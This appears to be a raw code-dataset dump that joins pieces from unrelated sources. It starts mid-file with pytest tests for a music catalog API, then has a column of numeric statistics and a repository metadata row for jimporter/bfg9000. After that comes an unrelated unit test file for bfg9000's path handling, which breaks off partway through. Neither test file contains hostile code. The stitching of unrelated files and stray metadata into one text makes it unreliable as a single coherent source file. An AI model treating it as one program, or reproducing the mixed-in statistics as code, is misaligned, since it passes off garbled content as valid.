    res = await async_client.get("/api/albums/?name=Powerslave")
    assert res.status_code == 404
@pytest.mark.asyncio
async def test_get_albums_by_invalid_name_response(async_client: AsyncClient) -> None:
    """A missing album search carries the not-found detail message."""
    res = await async_client.get("/api/albums/?name=Powerslave")
    assert res.json() == {'detail': 'Album not found.'}
@pytest.mark.asyncio
async def test_get_albums_with_a_right_long_word_code(async_client: AsyncClient) -> None:
    """A multi-word album title that exists returns 200."""
    res = await async_client.get("/api/albums/?name=Crack the Skye")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_albums_with_a_right_long_word_response(async_client: AsyncClient) -> None:
    """A multi-word title matches exactly one album."""
    res = await async_client.get("/api/albums/?name=Crack the Skye")
    assert len(res.json()) == 1
@pytest.mark.asyncio
async def test_get_albums_with_a_wrong_long_word_code(async_client: AsyncClient) -> None:
    """A multi-word title absent from the catalog returns 404."""
    res = await async_client.get("/api/albums/?name=The Number of the Beast")
    assert res.status_code == 404
@pytest.mark.asyncio
async def test_get_albums_with_a_wrong_long_word_response(async_client: AsyncClient) -> None:
    """A missing multi-word album search carries the not-found detail."""
    res = await async_client.get("/api/albums/?name=The Number of the Beast")
    assert res.json() == {'detail': 'Album not found.'}
# Members
@pytest.mark.asyncio
async def test_get_members_code(async_client: AsyncClient) -> None:
    """Listing all members returns HTTP 200."""
    res = await async_client.get("/api/members/")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_members_response_size(async_client: AsyncClient) -> None:
    """The member list is non-empty."""
    res = await async_client.get("/api/members/")
    assert len(res.json()) > 0
@pytest.mark.asyncio
async def test_get_members_with_right_id_code(async_client: AsyncClient) -> None:
    """Fetching member id 1 succeeds."""
    res = await async_client.get("/api/members/1/")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_members_with_right_id_response(async_client: AsyncClient) -> None:
    """Member id 1 is 'Brent Hinds'."""
    res = await async_client.get("/api/members/1/")
    assert res.json()['name'] == 'Brent Hinds'
@pytest.mark.asyncio
async def test_get_members_with_wrong_id_code(async_client: AsyncClient) -> None:
    """A member id below the allowed minimum is rejected with 422."""
    res = await async_client.get("/api/members/0/")
    assert res.status_code == 422
@pytest.mark.asyncio
async def test_get_members_with_wrong_id_response(async_client: AsyncClient) -> None:
    """An out-of-range member id yields the ge=1 validation error body."""
    expected = {
        'detail': [
            {
                'ctx': {'limit_value': 1},
                'loc': ['path', 'id'],
                'msg': 'ensure this value is greater than or equal to 1',
                'type': 'value_error.number.not_ge'
            }
        ]
    }
    res = await async_client.get("/api/members/0/")
    assert res.json() == expected
@pytest.mark.asyncio
async def test_get_members_by_valid_acronymous_code(async_client: AsyncClient) -> None:
    """Searching members by a matching name fragment succeeds."""
    res = await async_client.get("/api/members/?name=Bran")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_members_by_valid_acronymous_response(async_client: AsyncClient) -> None:
    """The fragment 'Bre' matches at least one member.

    NOTE(review): the sibling `_code` test queries 'Bran' while this one
    queries 'Bre' — presumably intentional, but worth confirming.
    """
    res = await async_client.get("/api/members/?name=Bre")
    assert len(res.json()) >= 1
@pytest.mark.asyncio
async def test_get_members_by_invalid_name_code(async_client: AsyncClient) -> None:
    """Searching for a member name not in the catalog returns 404."""
    res = await async_client.get("/api/members/?name=Pery")
    assert res.status_code == 404
@pytest.mark.asyncio
async def test_get_members_by_invalid_name_response(async_client: AsyncClient) -> None:
    """A missing member search carries the not-found detail message."""
    res = await async_client.get("/api/members/?name=Pery")
    assert res.json() == {'detail': 'Member not found.'}
@pytest.mark.asyncio
async def test_get_members_with_a_right_long_word_code(async_client: AsyncClient) -> None:
    """A multi-word member name that exists returns 200."""
    res = await async_client.get("/api/members/?name=Brann Dailor")
    assert res.status_code == 200
@pytest.mark.asyncio
async def test_get_members_with_a_right_long_word_response(async_client: AsyncClient) -> None:
    """A multi-word member name matches exactly one member."""
    res = await async_client.get("/api/members/?name=Brann Dailor")
    assert len(res.json()) == 1
@pytest.mark.asyncio
async def test_get_members_with_a_wrong_long_word_code(async_client: AsyncClient) -> None:
    """A multi-word member name absent from the catalog returns 404."""
    res = await async_client.get("/api/members/?name=Bruce Dickinson")
    assert res.status_code == 404
@pytest.mark.asyncio
async def test_get_members_with_a_wrong_long_word_response(async_client: AsyncClient) -> None:
    """A missing multi-word member search carries the not-found detail."""
    res = await async_client.get("/api/members/?name=Bruce Dickinson")
    assert res.json() == {'detail': 'Member not found.'}
| 26.966292
| 76
| 0.702639
| 955
| 7,200
| 5.027225
| 0.096335
| 0.130598
| 0.099146
| 0.128307
| 0.938138
| 0.934805
| 0.934805
| 0.918559
| 0.90252
| 0.899188
| 0
| 0.010188
| 0.182083
| 7,200
| 266
| 77
| 27.067669
| 0.80506
| 0.001944
| 0
| 0.742574
| 0
| 0
| 0.137547
| 0.058889
| 0
| 0
| 0
| 0
| 0.138614
| 1
| 0.004951
| false
| 0
| 0.019802
| 0
| 0.024752
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
630e9905188b627d6ed208690646fb00ca2b223e
| 38,667
|
py
|
Python
|
test/unit/test_path.py
|
jimporter/bfg9000
|
c206646ecfed0d1a510e993b93e6a15677f45a14
|
[
"BSD-3-Clause"
] | 72
|
2015-06-23T02:35:13.000Z
|
2021-12-08T01:47:40.000Z
|
test/unit/test_path.py
|
jimporter/bfg9000
|
c206646ecfed0d1a510e993b93e6a15677f45a14
|
[
"BSD-3-Clause"
] | 139
|
2015-03-01T18:48:17.000Z
|
2021-06-18T15:45:14.000Z
|
test/unit/test_path.py
|
jimporter/bfg9000
|
c206646ecfed0d1a510e993b93e6a15677f45a14
|
[
"BSD-3-Clause"
] | 19
|
2015-12-23T21:24:33.000Z
|
2022-01-06T04:04:41.000Z
|
import os
from collections import namedtuple
from contextlib import contextmanager
from unittest import mock
from . import *
from bfg9000 import path
from bfg9000.platforms import target
from bfg9000.safe_str import jbos
# Minimal stand-in for a bfg9000 Environment: these tests only read
# `.target_platform` (see test_cross below).
MockEnv = namedtuple('MockEnv', ['target_platform'])

# Variable mapping handed to Path.realize() throughout the tests.
# builddir maps to None, i.e. no prefix — builddir-rooted paths realize
# relative to the current directory (see test_realize_builddir).
path_variables = {
    path.Root.srcdir: '$(srcdir)',
    path.Root.builddir: None,
    path.InstallRoot.prefix: '$(prefix)',
    path.InstallRoot.bindir: '$(bindir)',
}
@contextmanager
def mock_filesystem(*, listdir=None, exists=None, isdir=None, islink=None):
    """Patch filesystem probes with a small fake tree.

    The fake tree is: root -> ['file.cpp', 'dir'], 'dir' -> ['file2.txt',
    'sub'], 'sub' -> []. Any probe may be overridden via the keyword
    arguments. Yields the four patcher results.
    """
    def fake_listdir(path):
        children = {'dir': ['file2.txt', 'sub'], 'sub': []}
        return children.get(os.path.basename(path), ['file.cpp', 'dir'])

    def fake_exists(path, variables=None):
        return True

    def fake_isdir(path, variables=None):
        # Anything whose basename starts with 'file' is a regular file.
        return not path.basename().startswith('file')

    def fake_islink(path, variables=None):
        return False

    with mock.patch('os.listdir', listdir or fake_listdir) as a, \
         mock.patch('bfg9000.path.exists', exists or fake_exists) as b, \
         mock.patch('bfg9000.path.isdir', isdir or fake_isdir) as c, \
         mock.patch('bfg9000.path.islink', islink or fake_islink) as d:  # noqa
        yield a, b, c, d
class TestPath(PathTestCase):
def test_construct(self):
    """Relative paths normalize separators and '.'/'..' components."""
    cases = [
        # (input, expected suffix, expected directory flag)
        ('foo/bar', 'foo/bar', False),
        (r'foo\bar', 'foo/bar', False),
        ('foo/bar/../.', 'foo', True),
        ('foo/.././bar', 'bar', False),
    ]
    for suffix_in, suffix_out, is_dir in cases:
        p = self.Path(suffix_in, path.Root.srcdir)
        self.assertEqual(p.suffix, suffix_out)
        self.assertEqual(p.root, path.Root.srcdir)
        self.assertEqual(p.directory, is_dir)
        self.assertEqual(p.destdir, False)
        self.assertEqual(p.has_drive(), False)

    # Escaping above the root, or an invalid root, is an error.
    for args in (('..', path.Root.srcdir),
                 ('foo/../..', path.Root.srcdir),
                 ('foo/../../bar', path.Root.srcdir),
                 ('foo', None),
                 ('foo', 'root')):
        self.assertRaises(ValueError, self.Path, *args)
def test_construct_absolute(self):
    """Absolute inputs force Root.absolute regardless of the requested root."""
    cases = [
        # (input, requested root, expected suffix, expected has_drive)
        ('/foo/bar', path.Root.absolute, '/foo/bar', False),
        ('/foo/bar', path.Root.srcdir, '/foo/bar', False),
        ('C:/foo/bar', path.Root.srcdir, 'C:/foo/bar', True),
        (r'C:\foo\bar', path.Root.srcdir, 'C:/foo/bar', True),
        ('//server/mount/foo/bar', path.Root.srcdir,
         '//server/mount/foo/bar', True),
        (r'\\server\mount\foo\bar', path.Root.srcdir,
         '//server/mount/foo/bar', True),
    ]
    for suffix_in, root_in, suffix_out, drive in cases:
        p = self.Path(suffix_in, root_in)
        self.assertEqual(p.suffix, suffix_out)
        self.assertEqual(p.root, path.Root.absolute)
        self.assertEqual(p.directory, False)
        self.assertEqual(p.destdir, False)
        self.assertEqual(p.has_drive(), drive)

    # A relative suffix with Root.absolute, or a drive-relative path,
    # is rejected.
    self.assertRaises(ValueError, self.Path, 'foo/bar', path.Root.absolute)
    self.assertRaises(ValueError, self.Path, 'c:foo')
def test_construct_directory(self):
    """Trailing separators and '.' components mark a path as a directory."""
    cases = [
        # (input, root, expected suffix, expected root, has_drive)
        ('foo/bar/', path.Root.srcdir, 'foo/bar', path.Root.srcdir, False),
        ('foo\\bar\\', path.Root.srcdir, 'foo/bar', path.Root.srcdir,
         False),
        ('.', path.Root.srcdir, '', path.Root.srcdir, False),
        ('./', path.Root.srcdir, '', path.Root.srcdir, False),
        ('foo/../.', path.Root.srcdir, '', path.Root.srcdir, False),
        ('/foo/bar/', path.Root.absolute, '/foo/bar', path.Root.absolute,
         False),
        ('/', path.Root.absolute, '/', path.Root.absolute, False),
        ('/.', path.Root.absolute, '/', path.Root.absolute, False),
        ('C:/', path.Root.srcdir, 'C:/', path.Root.absolute, True),
        ('C:/.', path.Root.srcdir, 'C:/', path.Root.absolute, True),
    ]
    for suffix_in, root_in, suffix_out, root_out, drive in cases:
        p = self.Path(suffix_in, root_in)
        self.assertEqual(p.suffix, suffix_out)
        self.assertEqual(p.root, root_out)
        self.assertEqual(p.directory, True)
        self.assertEqual(p.destdir, False)
        self.assertEqual(p.has_drive(), drive)

    # The directory flag can also be passed explicitly...
    p = self.Path('foo/bar', path.Root.srcdir, directory=True)
    self.assertEqual(p.suffix, 'foo/bar')
    self.assertEqual(p.root, path.Root.srcdir)
    self.assertEqual(p.directory, True)
    self.assertEqual(p.destdir, False)
    self.assertEqual(p.has_drive(), False)

    # ...but contradicting a trailing slash is an error.
    self.assertRaises(ValueError, self.Path, 'foo/', path.Root.srcdir,
                      directory=False)
def test_construct_destdir(self):
    """destdir=True is accepted for install roots and absolute paths only."""
    cases = [
        # (input, requested root, expected root)
        ('foo/bar', path.InstallRoot.bindir, path.InstallRoot.bindir),
        ('/foo/bar', path.Root.absolute, path.Root.absolute),
        ('/foo/bar', path.InstallRoot.bindir, path.Root.absolute),
    ]
    for suffix_in, root_in, root_out in cases:
        p = self.Path(suffix_in, root_in, True)
        self.assertEqual(p.suffix, suffix_in)
        self.assertEqual(p.root, root_out)
        self.assertEqual(p.directory, False)
        self.assertEqual(p.destdir, True)
        self.assertEqual(p.has_drive(), False)

    # srcdir-rooted paths cannot take a destdir.
    self.assertRaises(ValueError, self.Path, 'foo/bar', path.Root.srcdir,
                      True)
def test_construct_relative(self):
    """A Path base supplies the root, destdir flag and suffix prefix."""
    bases = (self.Path('foo', path.Root.srcdir),
             self.Path('/foo', path.Root.absolute),
             self.Path('foo', path.InstallRoot.bindir, True))
    for base in bases:
        def check(p, suffix, directory, destdir):
            self.assertEqual(p.suffix, suffix)
            self.assertEqual(p.root, base.root)
            self.assertEqual(p.directory, directory)
            self.assertEqual(p.destdir, destdir)
            self.assertEqual(p.has_drive(), False)

        check(self.Path('bar', base), base.suffix + '/bar', False,
              base.destdir)
        check(self.Path('bar/', base), base.suffix + '/bar', True,
              base.destdir)
        check(self.Path('..', base), base.suffix.replace('foo', ''), True,
              base.destdir)
        # An explicit destdir argument overrides the base's flag.
        check(self.Path('bar', base, True), base.suffix + '/bar', False,
              True)
        check(self.Path('bar', base, False), base.suffix + '/bar', False,
              False)

        # An absolute suffix ignores the base entirely.
        p = self.Path('/bar', base)
        self.assertEqual(p.suffix, '/bar')
        self.assertEqual(p.root, path.Root.absolute)
        self.assertEqual(p.directory, False)
        self.assertEqual(p.destdir, False)
        self.assertEqual(p.has_drive(), False)

        # Non-absolute bases cannot be escaped upward.
        if base.root != path.Root.absolute:
            self.assertRaises(ValueError, self.Path, '../..', base)
def test_ensure(self):
    """Path.ensure() wraps strings and passes Path instances through."""
    self.assertPathEqual(self.Path.ensure('foo'), self.Path('foo'))
    self.assertPathEqual(self.Path.ensure('foo', path.Root.srcdir),
                         self.Path('foo', path.Root.srcdir))
    self.assertPathEqual(self.Path.ensure('foo', directory=True),
                         self.Path('foo/'))
    self.assertPathEqual(
        self.Path.ensure('foo', path.InstallRoot.bindir, True),
        self.Path('foo', path.InstallRoot.bindir, True)
    )

    # Existing Path objects are returned unchanged (same object identity).
    existing = self.Path('foo')
    self.assertIs(self.Path.ensure(existing), existing)
    self.assertIs(self.Path.ensure(existing, path.Root.srcdir), existing)
    self.assertIs(self.Path.ensure(existing, path.InstallRoot.bindir, True),
                  existing)

    # strict=True rejects paths whose root differs from the requested one.
    self.assertRaises(ValueError, self.Path.ensure, existing,
                      path.Root.srcdir, strict=True)
    self.assertRaises(ValueError, self.Path.ensure, '/foo',
                      path.Root.srcdir, strict=True)

    # A Path base acts as the parent directory for string inputs.
    base = self.Path('base')
    self.assertPathEqual(self.Path.ensure('foo', base),
                         self.Path('base/foo'))
    self.assertPathEqual(self.Path.ensure('foo', base),
                         self.Path('base/foo'))
    self.assertPathEqual(self.Path.ensure('/foo', base), self.Path('/foo'))
    self.assertIs(self.Path.ensure(existing, base), existing)

    self.assertRaises(ValueError, self.Path.ensure,
                      self.Path('foo', path.Root.srcdir), strict=True)
    self.assertRaises(ValueError, self.Path.ensure, '/foo', strict=True)
def test_equality(self):
    """Paths are equal iff root, normalized suffix, destdir and platform
    class all match; both == and != are exercised for each pair."""
    equal_pairs = [
        (self.Path('a', path.Root.srcdir),
         self.Path('a', path.Root.srcdir)),
        (self.Path('a', path.InstallRoot.bindir, True),
         self.Path('a', path.InstallRoot.bindir, True)),
        # A trailing slash normalizes away for comparison purposes.
        (self.Path('a', path.Root.srcdir),
         self.Path('a/', path.Root.srcdir)),
    ]
    for lhs, rhs in equal_pairs:
        self.assertTrue(lhs == rhs)
        self.assertFalse(lhs != rhs)

    winpath = target.platform_info('winnt').Path
    linuxpath = target.platform_info('linux').Path
    unequal_pairs = [
        (self.Path('a', path.Root.srcdir),
         self.Path('a', path.Root.builddir)),
        (self.Path('a', path.Root.srcdir),
         self.Path('b', path.Root.srcdir)),
        (self.Path('a', path.InstallRoot.bindir, True),
         self.Path('a', path.InstallRoot.bindir, False)),
        # Different platform Path classes never compare equal.
        (winpath('a'), linuxpath('a')),
        # Nor does a Path compare equal to a plain string.
        (self.Path('a', path.Root.srcdir), 'a'),
    ]
    for lhs, rhs in unequal_pairs:
        self.assertFalse(lhs == rhs)
        self.assertTrue(lhs != rhs)
def test_cross(self):
    """cross() re-creates the path with the target platform's Path class."""
    for name in ('winnt', 'linux'):
        platform = target.platform_info(name)
        env = MockEnv(platform)

        for args in (('foo/bar', path.Root.srcdir),
                     ('foo/bar/', path.Root.srcdir)):
            p = self.Path(*args)
            self.assertPathEqual(p.cross(env), platform.Path(*args))

        # The expected result carries no destdir flag.
        p = self.Path('foo/bar', path.InstallRoot.bindir, destdir=True)
        self.assertPathEqual(
            p.cross(env),
            platform.Path('foo/bar', path.InstallRoot.bindir)
        )
def test_as_directory(self):
    """as_directory() converts files and is a no-op on directories."""
    file_path = self.Path('foo', path.Root.srcdir)
    dir_path = self.Path('foo/', path.Root.srcdir)
    self.assertPathEqual(file_path.as_directory(), dir_path)
    # Already a directory: the very same object is returned.
    self.assertIs(dir_path.as_directory(), dir_path)
def test_parent(self):
    """parent() strips the last component; the root itself has no parent."""
    self.assertPathEqual(self.Path('foo/bar', path.Root.srcdir).parent(),
                         self.Path('foo/', path.Root.srcdir))
    self.assertPathEqual(self.Path('bar', path.Root.srcdir).parent(),
                         self.Path('./', path.Root.srcdir))
    self.assertRaises(ValueError, self.Path('', path.Root.srcdir).parent)
    # destdir is preserved on the parent.
    self.assertPathEqual(
        self.Path('foo/bar', path.InstallRoot.bindir, True).parent(),
        self.Path('foo/', path.InstallRoot.bindir, True)
    )
def test_append(self):
    """append() joins suffixes, normalizes separators and honors absolutes."""
    Root = path.Root
    p = self.Path('foo', Root.srcdir)
    cases = [
        ('bar', self.Path('foo/bar', Root.srcdir)),
        ('bar/baz', self.Path('foo/bar/baz', Root.srcdir)),
        (r'bar\baz', self.Path('foo/bar/baz', Root.srcdir)),
        ('.', self.Path('foo/', Root.srcdir)),
        ('..', self.Path('', Root.srcdir)),
        ('../bar', self.Path('bar', Root.srcdir)),
        (r'..\bar', self.Path('bar', Root.srcdir)),
        ('bar/', self.Path('foo/bar/', Root.srcdir)),
        ('./', self.Path('foo/', Root.srcdir)),
        # Appending an absolute path discards the original entirely.
        ('/bar', self.Path('/bar', Root.absolute)),
        ('C:/bar', self.Path('C:/bar', Root.absolute)),
        (r'C:\bar', self.Path('C:/bar', Root.absolute)),
        ('//server/mount/bar',
         self.Path('//server/mount/bar', Root.absolute)),
        (r'\\server\mount\bar',
         self.Path('//server/mount/bar', Root.absolute)),
    ]
    for arg, expected in cases:
        self.assertPathEqual(p.append(arg), expected)

    # destdir is carried through to the result.
    q = self.Path('foo', path.InstallRoot.bindir, True)
    self.assertPathEqual(
        q.append('bar'),
        self.Path('foo/bar', path.InstallRoot.bindir, True)
    )

    # Appending cannot escape above the root.
    self.assertRaises(ValueError, p.append, '../..')
def test_ext(self):
    """ext() returns the file extension including the leading dot."""
    self.assertEqual(self.Path('foo.txt', path.Root.srcdir).ext(), '.txt')
def test_addext(self):
    """addext() appends an extension, preserving directory/destdir flags."""
    self.assertPathEqual(
        self.Path('foo', path.Root.srcdir).addext('.txt'),
        self.Path('foo.txt', path.Root.srcdir))
    self.assertPathEqual(
        self.Path('foo/', path.Root.srcdir).addext('.txt'),
        self.Path('foo.txt/', path.Root.srcdir))
    self.assertPathEqual(
        self.Path('foo', path.InstallRoot.bindir, True).addext('.txt'),
        self.Path('foo.txt', path.InstallRoot.bindir, True))
def test_stripext(self):
    """stripext() drops — or replaces — the extension of the basename."""
    cases = [
        # (input suffix, replacement ext or None, expected suffix)
        ('foo.txt', None, 'foo'),
        ('foo.txt', '.cpp', 'foo.cpp'),
        ('foo.txt/', None, 'foo/'),
        ('foo.txt/', '.cpp', 'foo.cpp/'),
        # Without an extension, stripping is a no-op but replacing adds one.
        ('foo', None, 'foo'),
        ('foo', '.cpp', 'foo.cpp'),
    ]
    for suffix, new_ext, expected in cases:
        p = self.Path(suffix, path.Root.srcdir)
        result = p.stripext() if new_ext is None else p.stripext(new_ext)
        self.assertPathEqual(result, self.Path(expected, path.Root.srcdir))

    # destdir is preserved.
    p = self.Path('foo.txt', path.InstallRoot.bindir, True)
    self.assertPathEqual(p.stripext(),
                         self.Path('foo', path.InstallRoot.bindir, True))
def test_splitleaf(self):
    """splitleaf() returns (parent directory Path, final component name)."""
    parent, leaf = self.Path('foo/bar/baz', path.Root.srcdir).splitleaf()
    self.assertPathEqual(parent, self.Path('foo/bar/', path.Root.srcdir))
    self.assertEqual(leaf, 'baz')
def test_split(self):
    """split() breaks the suffix into components; an empty path gives []."""
    self.assertEqual(self.Path('', path.Root.srcdir).split(), [])
    self.assertEqual(self.Path('foo/bar/baz', path.Root.srcdir).split(),
                     ['foo', 'bar', 'baz'])
def test_basename(self):
    """basename() is the last path component."""
    self.assertEqual(self.Path('foo/bar', path.Root.srcdir).basename(),
                     'bar')
def test_relpath_relative(self):
    """relpath() between same-root paths, with optional prefix and
    localize flag (localize=True uses the OS separator)."""
    join = self.ospath.join
    p = self.Path('foo/bar', path.Root.srcdir)

    # Relative to itself.
    self.assertEqual(p.relpath(p), '.')
    self.assertEqual(p.relpath(p, 'pre'), 'pre')
    self.assertEqual(p.relpath(p, localize=False), '.')
    self.assertEqual(p.relpath(p, 'pre', False), 'pre')

    # Relative to its parent.
    start = self.Path('foo', path.Root.srcdir)
    self.assertEqual(p.relpath(start), 'bar')
    self.assertEqual(p.relpath(start, 'pre'), join('pre', 'bar'))
    self.assertEqual(p.relpath(start, localize=False), 'bar')
    self.assertEqual(p.relpath(start, 'pre', False), 'pre/bar')

    # Relative to a sibling directory.
    start = self.Path('baz', path.Root.srcdir)
    self.assertEqual(p.relpath(start), join('..', 'foo', 'bar'))
    self.assertEqual(p.relpath(start, 'pre'),
                     join('pre', '..', 'foo', 'bar'))
    self.assertEqual(p.relpath(start, localize=False), '../foo/bar')
    self.assertEqual(p.relpath(start, 'pre', False), 'pre/../foo/bar')

    # Relative to the root directory.
    start = self.Path('.', path.Root.srcdir)
    self.assertEqual(p.relpath(start), join('foo', 'bar'))
    self.assertEqual(p.relpath(start, 'pre'), join('pre', 'foo', 'bar'))
    self.assertEqual(p.relpath(start, localize=False), 'foo/bar')
    self.assertEqual(p.relpath(start, 'pre', False), 'pre/foo/bar')

    # The root directory relative to a child of it.
    dot = self.Path('.', path.Root.srcdir)
    start = path.Path('foo', path.Root.srcdir)
    self.assertEqual(dot.relpath(start), '..')
    self.assertEqual(dot.relpath(start, 'pre'), join('pre', '..'))
    self.assertEqual(dot.relpath(start, localize=False), '..')
    self.assertEqual(dot.relpath(start, 'pre', False), 'pre/..')

    # Paths under different roots cannot be related.
    self.assertRaises(
        ValueError,
        lambda: p.relpath(self.Path('foo', path.Root.builddir))
    )
def test_relpath_absolute(self):
    """Absolute paths are returned as-is (localized), ignoring the start."""
    sep = self.ospath.sep
    join = self.ospath.join

    p = self.Path('/foo/bar')
    # Whether the start is relative or absolute makes no difference.
    for start in (self.Path('start'), self.Path('/start')):
        self.assertEqual(p.relpath(start), join(sep, 'foo', 'bar'))
        self.assertEqual(p.relpath(start, 'pre'), join(sep, 'foo', 'bar'))
        self.assertEqual(p.relpath(start, localize=False), '/foo/bar')
        self.assertEqual(p.relpath(start, 'pre', False), '/foo/bar')

    # Drive-letter paths keep their drive when localized.
    p = self.Path(r'C:\foo\bar')
    localized = 'C:' + sep + join('foo', 'bar')
    self.assertEqual(p.relpath(self.Path(r'C:\start')), localized)
    self.assertEqual(p.relpath(self.Path(r'C:\start'), 'pre'), localized)
    self.assertEqual(p.relpath(self.Path(r'C:\start'), localize=False),
                     'C:/foo/bar')
    self.assertEqual(p.relpath(self.Path(r'C:\start'), 'pre', False),
                     'C:/foo/bar')
def test_reroot(self):
    """reroot() swaps the root while keeping suffix and flags."""
    self.assertPathEqual(
        self.Path('foo/bar', path.Root.srcdir).reroot(path.Root.builddir),
        self.Path('foo/bar', path.Root.builddir))
    self.assertPathEqual(
        self.Path('foo/bar/', path.Root.srcdir).reroot(path.Root.builddir),
        self.Path('foo/bar/', path.Root.builddir))
    # destdir survives rerooting between install roots.
    self.assertPathEqual(
        self.Path('foo/bar', path.InstallRoot.bindir, True)
            .reroot(path.InstallRoot.libdir),
        self.Path('foo/bar', path.InstallRoot.libdir, True))
def test_to_json(self):
    """to_json() serializes to [suffix, root name, destdir]."""
    cases = [
        (('foo', path.Root.srcdir), ['foo', 'srcdir', False]),
        (('foo/', path.Root.srcdir), ['foo/', 'srcdir', False]),
        (('./', path.Root.srcdir), ['./', 'srcdir', False]),
        (('/', path.Root.absolute), ['/', 'absolute', False]),
        (('foo', path.InstallRoot.bindir, True), ['foo', 'bindir', True]),
    ]
    for args, expected in cases:
        self.assertEqual(self.Path(*args).to_json(), expected)
def test_from_json(self):
    """from_json() reconstructs a Path from the to_json() triple."""
    self.assertPathEqual(self.Path.from_json(['foo', 'srcdir', False]),
                         self.Path('foo', path.Root.srcdir))
    self.assertPathEqual(self.Path.from_json(['foo', 'bindir', True]),
                         self.Path('foo', path.InstallRoot.bindir, True))
def test_realize_srcdir(self):
    """srcdir-rooted paths realize under the $(srcdir) variable; the
    executable flag makes no difference here."""
    join = self.ospath.join
    for suffix, parts in (('foo', ('foo',)), ('foo/bar', ('foo', 'bar'))):
        p = self.Path(suffix, path.Root.srcdir)
        expected = join('$(srcdir)', *parts)
        self.assertEqual(p.realize(path_variables), expected)
        self.assertEqual(p.realize(path_variables, executable=True),
                         expected)
def test_realize_builddir(self):
p = self.Path('foo', path.Root.builddir)
self.assertEqual(p.realize(path_variables), 'foo')
self.assertEqual(p.realize(path_variables, executable=True),
self.ospath.join('.', 'foo'))
p = self.Path('foo/bar', path.Root.builddir)
self.assertEqual(p.realize(path_variables),
self.ospath.join('foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
self.ospath.join('foo', 'bar'))
def test_realize_absolute(self):
ospath = self.ospath
p = self.Path('/foo/bar', path.Root.builddir)
self.assertEqual(p.realize(path_variables),
ospath.join(ospath.sep, 'foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
ospath.join(ospath.sep, 'foo', 'bar'))
p = self.Path(r'C:\foo\bar', path.Root.builddir)
self.assertEqual(p.realize(path_variables),
'C:' + ospath.sep + ospath.join('foo', 'bar'))
self.assertEqual(p.realize(path_variables, executable=True),
'C:' + ospath.sep + ospath.join('foo', 'bar'))
def test_realize_srcdir_empty(self):
p = self.Path('', path.Root.srcdir)
self.assertEqual(p.realize(path_variables), '$(srcdir)')
self.assertEqual(p.realize(path_variables, executable=True),
'$(srcdir)')
def test_realize_builddir_empty(self):
p = self.Path('', path.Root.builddir)
self.assertEqual(p.realize(path_variables), '.')
self.assertEqual(p.realize(path_variables, executable=True), '.')
def test_realize_destdir(self):
path_vars_with_destdir = path_variables.copy()
path_vars_with_destdir[path.DestDir.destdir] = '$(destdir)'
p = self.Path('foo', path.InstallRoot.bindir, True)
self.assertEqual(p.realize(path_variables),
self.ospath.join('$(bindir)', 'foo'))
self.assertEqual(p.realize(path_vars_with_destdir),
self.ospath.join('$(destdir)$(bindir)', 'foo'))
p = self.Path('/foo', path.Root.absolute, True)
self.assertEqual(p.realize(path_variables),
self.ospath.join(self.ospath.sep, 'foo'))
self.assertEqual(p.realize(path_vars_with_destdir),
self.ospath.join('$(destdir)', 'foo'))
def test_realize_no_variable_sep(self):
p = self.Path('foo', path.Root.srcdir)
self.assertEqual(p.realize(path_variables, variable_sep=False),
'$(srcdir)foo')
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(p.realize(path_variables, variable_sep=False),
self.ospath.join('$(srcdir)foo', 'bar'))
def test_string(self):
ospath = self.ospath
paths = {path.Root.srcdir: self.Path('/srcdir', path.Root.absolute)}
p = self.Path('/foo/bar', path.Root.absolute)
self.assertEqual(p.string(), ospath.join(ospath.sep, 'foo', 'bar'))
p = self.Path('foo/bar', path.Root.srcdir)
self.assertEqual(
p.string(paths), ospath.join(ospath.sep, 'srcdir', 'foo', 'bar')
)
p = self.Path('.', path.Root.srcdir)
self.assertEqual(p.string(paths), ospath.join(ospath.sep, 'srcdir'))
def test_hash(self):
d = {self.Path('.', path.Root.srcdir),
self.Path('.', path.Root.builddir),
self.Path('foo', path.Root.srcdir),
self.Path('bar', path.InstallRoot.bindir),
self.Path('bar', path.InstallRoot.bindir, destdir=True)}
self.assertEqual(len(d), 5)
def test_add(self):
p = self.Path('foo/bar', path.Root.srcdir)
result = p + 'baz'
self.assertEqual(type(result), jbos)
self.assertEqual(result.bits, (p, 'baz'))
result = 'baz' + p
self.assertEqual(type(result), jbos)
self.assertEqual(result.bits, ('baz', p))
class TestAbsPath(TestCase):
    """Tests for path.abspath() under a mocked working directory."""

    def test_abspath(self):
        with mock.patch('os.getcwd', return_value=r'/base'):
            for arg, expected in [('foo', '/base/foo'),
                                  ('/foo/bar', '/foo/bar'),
                                  ('foo/', '/base/foo/'),
                                  ('/foo/bar/', '/foo/bar/')]:
                self.assertPathEqual(
                    path.abspath(arg),
                    path.Path(expected, path.Root.absolute)
                )
            self.assertPathEqual(path.abspath('foo', directory=True),
                                 path.Path('/base/foo/', path.Root.absolute))
            self.assertRaises(ValueError, path.abspath, 'foo/',
                              directory=False)

    def test_drive(self):
        # Drive letters come from the mocked cwd unless explicitly given.
        with mock.patch('os.getcwd', return_value=r'C:\base'):
            for arg, expected in [('foo', 'C:/base/foo'),
                                  ('/foo/bar', 'C:/foo/bar'),
                                  ('D:/foo/bar', 'D:/foo/bar')]:
                self.assertPathEqual(
                    path.abspath(arg),
                    path.Path(expected, path.Root.absolute)
                )

    def test_rel_drive(self):
        # absdrive=False leaves drive-less paths without a drive letter.
        with mock.patch('os.getcwd', return_value=r'C:\base'):
            for arg, expected in [('foo', '/base/foo'),
                                  ('/foo/bar', '/foo/bar'),
                                  ('D:/foo/bar', 'D:/foo/bar')]:
                self.assertPathEqual(
                    path.abspath(arg, absdrive=False),
                    path.Path(expected, path.Root.absolute)
                )
class TestCommonPrefix(TestCase):
    """Tests for path.commonprefix()."""

    def test_empty(self):
        self.assertEqual(path.commonprefix([]), None)

    def test_single(self):
        only = path.Path('foo/bar')
        self.assertPathEqual(path.commonprefix([only]), only)

    def test_multi_same(self):
